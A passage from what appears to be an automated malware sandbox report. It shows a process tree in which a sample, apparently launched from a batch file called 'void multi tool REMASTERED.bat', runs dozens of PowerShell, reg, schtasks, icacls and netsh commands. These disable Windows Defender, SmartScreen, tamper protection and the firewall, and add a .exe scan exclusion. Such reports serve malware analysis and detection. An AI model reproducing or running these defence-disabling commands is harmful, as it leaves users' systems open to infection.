    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5272
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus / t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:1056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5372
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5748
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3004
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:5812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5124
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:5820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:932
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:6120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:636
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
      4⤵
      Modifies registry key
      PID:5972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:696
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:3948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:4176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5528
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
      4⤵
      PID:4284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5016
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable
      4⤵
      PID:5780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable
      4⤵
      PID:1584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable
      4⤵
      PID:2752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3444
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable
      4⤵
      PID:472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f
      4⤵
      Modifies registry key
      PID:456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
      4⤵
      Modifies registry key
      PID:3752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
      4⤵
      Modifies registry class
      PID:5184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
      4⤵
      Modifies registry class
      PID:6128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5660
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
      4⤵
      Modifies registry class
      PID:2200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4864
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
      4⤵
      Modifies Security services
      Modifies registry key
      PID:5888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5416
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
      4⤵
      Modifies Security services
      Modifies registry key
      PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5772
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
      4⤵
      Modifies Security services
      Modifies registry key
      PID:4656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5148
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
      4⤵
      Modifies Security services
      Modifies registry key
      PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4840
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      Modifies registry key
      PID:1224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:5944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" takeown /f "%systemroot%\System32\smartscreen.exe" /a
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /f %systemroot%\System32\smartscreen.exe /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /reset
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5784
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /reset
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" taskkill /im smartscreen.exe /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:220
  - - C:\Windows\system32\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /im smartscreen.exe /f
      4⤵
      Kills process with taskkill
      PID:5668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -PUAProtection disable
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:6036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3744
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 8
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:328
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:6296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:3412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 8
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\void multi tool REMASTERED.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/t7PfdVvCah
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:5324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffb7b0746f8,0x7ffb7b074708,0x7ffb7b074718
      4⤵
      PID:3680
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
      4⤵
      PID:6040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
      4⤵
      PID:5232
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
      4⤵
      PID:3600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
      4⤵
      PID:6060
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
      4⤵
      PID:4908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
